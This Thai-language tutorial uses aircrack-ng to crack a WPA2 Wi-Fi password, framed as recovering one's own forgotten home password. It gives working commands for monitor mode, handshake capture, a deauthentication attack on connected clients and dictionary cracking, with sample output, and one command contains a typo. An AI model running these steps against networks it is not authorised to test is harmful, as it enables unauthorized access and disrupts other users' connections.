Aircrack Ng หารหัส wifi ที่บ้าน

ใช้ aircrack-ng หารหัส wifi ที่บ้าน

ตัว wifi card ต้อง support monitor mode ด้วยนะ ถึงจะทำได้ โดยเราจะหารหัส wifi ที่เราลืมว่ารหัสอะไรในบ้านเราเอง ที่เป็นแบบ WPA หรือ WPA2

ก่อนอื่นเราจะดูกันก่อนว่า ชื่อ Interface เราชื่ออะไร ในที่นี้ผมชื่อ wlan0

sudo airmon-ng

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Qualcomm Atheros AR9462 Wireless Network Adapter (rev 01)

หลังจากนั้นเราจะสั่งให้ wireless เรา ไปทำงานแบบ monitor mode เราจะใช้ net ไม่ได้แล้ว

sudo airmon-ng start wlan0

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Qualcomm Atheros AR9462 Wireless Network Adapter (rev 01)
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

เมื่อเรา kill process ที่ค้างไว้หมดแล้ว ให้ airmon-ng ใหม่ จะขึ้นรายการ อุปกรณ์เราว่าเปลี่ยนเป็น monitor mode แล้ว ชื่อว่า wlan0mon และเราจะทำการ kill process ทั้งหมดที่ wlan0mon ใช้งานอยู่ เพื่อป้องกันการรบกวน

sudo airmon-ng checl kill

PHY     Interface       Driver          Chipset

phy0    wlan0mon        ath9k           Qualcomm Atheros AR9462 Wireless Network Adapter (rev 01)

จากนั้นเราจะทำการ dump สัญญาณ wifi ที่เครื่องเราจับได้ขึ้นมา

sudo airodump-ng wlan0mon

 CH  7 ][ Elapsed: 48 s ][ 2021-10-15 20:42

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 XX:XX:XX:XX:XX:XX  -39      112     1575   32  11  130   WPA2 CCMP   PSK  Don't you dar_2.4G

แล้วเอา Mac Address เรากับช่องสัญญาณไปใส่ซะ รอจนกว่าจะมีคน Login เปิดคอมมาจับสัญญาณ Wifi ตัว WPA handshake: XX:XX:XX:XX:XX:XX จะขึ้นรายการมาให้เราเห็นว่า ได้รหัสมาแล้วนะ

sudo airodump-ng -c หมายเลข channel --bssid MAC Address -w ~/Desktop/ wlan0mon

20:45:11  Created capture file "/home/aofiee/Desktop/-02.cap".

 CH 11 ][ Elapsed: 4 mins ][ 2021-10-15 20:49 ][ WPA handshake: XX:XX:XX:XX:XX:XX

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 XX:XX:XX:XX:XX:XX  -41  13     2658   140903    6  11  130   WPA2 CCMP   PSK  Don't you dar_2.4G

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 XX:XX:XX:XX:XX:XX  ZZ:ZZ:ZZ:ZZ:ZZ:ZZ  -35   24e- 1    448     7956  EAPOL
 XX:XX:XX:XX:XX:XX  ZZ:ZZ:ZZ:ZZ:ZZ:ZZ  -54   24e-24e     6   135680
 XX:XX:XX:XX:XX:XX  ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -64    1e-24      2     1489

ถ้ารอนานมาก เราอาจใช้ aireplay ส่งข้อมูลไป De Authentication เครื่องที่เกาะใช้งานกับ ตัวกระจายสัญญาณเครื่องนั้น เพื่อยกเลิกการเชื่อมต่อชั่วคราว ตัว airodump จะได้ handshake กลับมาทันที

sudo aireplay-ng -0 2 -a MAC Address Router -c MAC Address เครื่องเป้าหมาย wlan0mon

แต่สุดท้ายเราจะได้ password หรือเปล่า อยู่ที่ password dictionary ของเราด้วย ว่ามีเยอะขนาดไหน และใช้เวลากี่วัน กี่เดือน หรือกี่ปี ในการ map password ออกมา

sudo aircrack-ng -a2 -b MAC Address -w password.txt file.cap

      Time left: 2 hours, 14 minutes, 1 second
      [00:00:16] 29887/14344391 keys tested (1811.70 k/s)

      Time left: 2 hours, 11 minutes, 41 seconds                 0.21%

                           KEY FOUND! [ helloworld ]


      Master Key     : 15 7A 63 83 E0 B7 BA E3 A2 20 AD C3 97 AA F1 C1
                       87 33 23 F0 4A 0A 20 D7 BA E1 4A D9 55 EF 7D 6C

      Transient Key  : 15 60 33 6C 83 60 47 7A 28 1C 08 6B FF F7 61 58
                       76 B1 CD B2 F2 92 0C 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

      EAPOL HMAC     : EF B9 A0 BE 7E 08 A0 9E E7 7B 25 FB 65 3B 53 8E

เสร็จแล้วย้ายกลับมาใช้ Internet เหมือนเดิม

sudo airmon-ng stop wlan0
systemctl restart NetworkManager

จะเห็นว่า ถ้าตั้งรหัสง่ายๆล่ะก็ โดนแน่นอน